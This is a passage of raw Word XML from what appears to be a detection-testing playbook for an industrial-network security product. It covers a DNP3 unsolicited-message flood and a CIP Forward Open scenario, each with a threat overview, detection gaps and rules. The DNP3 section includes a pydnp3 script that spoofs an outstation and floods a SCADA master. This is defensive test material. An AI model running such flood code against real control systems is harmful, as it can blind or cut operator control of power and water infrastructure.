      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Settings page UI to enroll the legitimate master per RTU. Default-deny once allowlist is populated.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Replay-window detection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — IEC-104 lacks anti-replay. Capability needed: track recently-issued commands per RTU and flag identical re-issues within 10s.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Scenario 09  ·  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="34"/>
        </w:rPr>
        <w:t>DNP3 unsolicited message flood</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T0814 — Denial of Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Severity (expected)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>(gap) HIGH (target)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Protocol(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>DNP3 (TCP/UDP 20000)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Kill-chain phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Denial of Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1D4ED8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>THREAT OVERVIEW</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>DNP3 outstations can send 'unsolicited' messages — pushed reports of events without the master polling. An attacker can spoof outstation identity and flood the master with crafted unsolicited responses, saturating the master's input queue and preventing it from issuing legitimate commands. This is the canonical DNP3 DoS technique.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1D4ED8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>REPRODUCTION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>DNP3 is not yet dissected by OTShield; this scenario exists to *deliberately* show a current gap. The reproduction is included so the gap analysis is concrete.</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scenario09_dnp3_unsolicited_flood.py</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t># Requires opendnp3 or pydnp3. Sketch only — adapt to your lab environment.</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>from pydnp3 import opendnp3, asiodnp3</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>import time</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>MASTER_IP = '10.40.0.5'</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>FAKE_OUTSTATION_ADDR = 1024</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>manager = asiodnp3.DNP3Manager(1)</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>channel = manager.AddTCPClient('flood', opendnp3.levels.NORMAL,</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">                                asiodnp3.ChannelRetry().Default(),</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">                                MASTER_IP, '0.0.0.0', 20000, None)</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>stack_cfg = asiodnp3.OutstationStackConfig(opendnp3.DatabaseSizes.AllTypes(10))</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>stack_cfg.link.LocalAddr  = FAKE_OUTSTATION_ADDR</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>stack_cfg.link.RemoteAddr = 1</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>outstation = channel.AddOutstation('flood', opendnp3.DefaultOutstationApplication(),</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">                                   opendnp3.DefaultCommandHandler(), stack_cfg)</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>outstation.Enable()</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t># Push 1000 unsolicited binary-input change events as fast as possible</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>for i in range(1000):</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    outstation.Apply(opendnp3.UpdateBuilder().Update(</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        opendnp3.Binary(i % 2 == 0, opendnp3.BinaryQuality.ONLINE), 0).Build())</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    time.sleep(0.001)</w:t>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>OTShield will record the connection in observed-connections (it sees the TCP session), so the topology will show the new edge — but no DPI event rows because there is no DNP3 dissector yet.</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(none) — DNP3 not dissected</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Rule ID (gap)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>dpi.dnp3_rate (after dissector lands)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Trigger (target)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>DNP3 unsolicited messages &gt; N/sec from a single outstation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Severity (target)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>MITRE ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>T0814 — Denial of Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>UI verification path:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Today: only the topology edge is visible — operator sees a new connection from an unexpected source on TCP/20000 with no protocol label (falls back to TCP).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Workaround for demo: filter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Network → Connections</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>dport=20000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>. Use the lack of DPI events as the demo lesson — 'this is what we're missing.'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">After dissector + rule land: anomaly with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>dnp3_function:UNSOLICITED_RESPONSE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>rate_per_sec:N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IMPACT NARRATIVE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>DNP3 is the dominant SCADA protocol in North American electric, water, and wastewater. A DoS at the master level cascades quickly:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Loss of view</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — master can't keep up with legitimate outstations; operator sees stale tags, alarms time out.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Loss of control</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — master cannot issue commands while its queue is saturated.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Cover for a parallel attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — DoS distracts the SOC while a slower targeted attack runs in parallel.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="92400E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GAP ANALYSIS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Two-level gap: dissector + rule:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>DNP3 dissector</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — at minimum, parse the data link layer (start bytes 0x05 0x64, src/dest, function code) and the application layer function code. Mirror the design of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ModbusDissector.java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>dpi.dnp3_rate rule</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — sliding-window unsolicited-message rate per outstation. Fire HIGH if rate &gt; 50/sec for &gt; 10s.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Outstation allowlist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — same shape as the IEC-104 master allowlist; reuse the asset-allowlist UI.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Scenario 10  ·  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="34"/>
        </w:rPr>
        <w:t>EtherNet/IP CIP Forward Open from untrusted host</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T0859 — Valid Accounts (Engineering Workstation)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Severity (expected)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>(gap) HIGH (target)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Protocol(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>EtherNet/IP (TCP/44818, CIP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Kill-chain phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Lateral Movement / Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1D4ED8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>THREAT OVERVIEW</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>EtherNet/IP carries CIP (Common Industrial Protocol) — the application protocol used by Allen-Bradley, Rockwell, and Omron PLCs. An attacker establishes an EIP session via Register Session, then uses CIP Forward Open to create an explicit messaging connection to a target device. From there, all subsequent CIP requests (read tag, write tag, reset device) ride that session. Detecting the session-origin host is the highest-leverage detection point.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1D4ED8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>REPRODUCTION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Use `pylogix` (Python EIP/CIP client) to read a tag from an Allen-Bradley ControlLogix lab PLC. The session-establishment traffic is what we want.</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scenario10_eip_cip_forward_open.py</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>from pylogix import PLC</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>with PLC() as comm:</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    comm.IPAddress = '10.10.2.30'   # ControlLogix</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    comm.ProcessorSlot = 0</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    # Register session + Forward Open + CIP Read</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    ret = comm.Read('Program:MainProgram.SetpointPressure')</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    print(ret.TagName, '=', ret.Value, '(', ret.Status, ')')</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
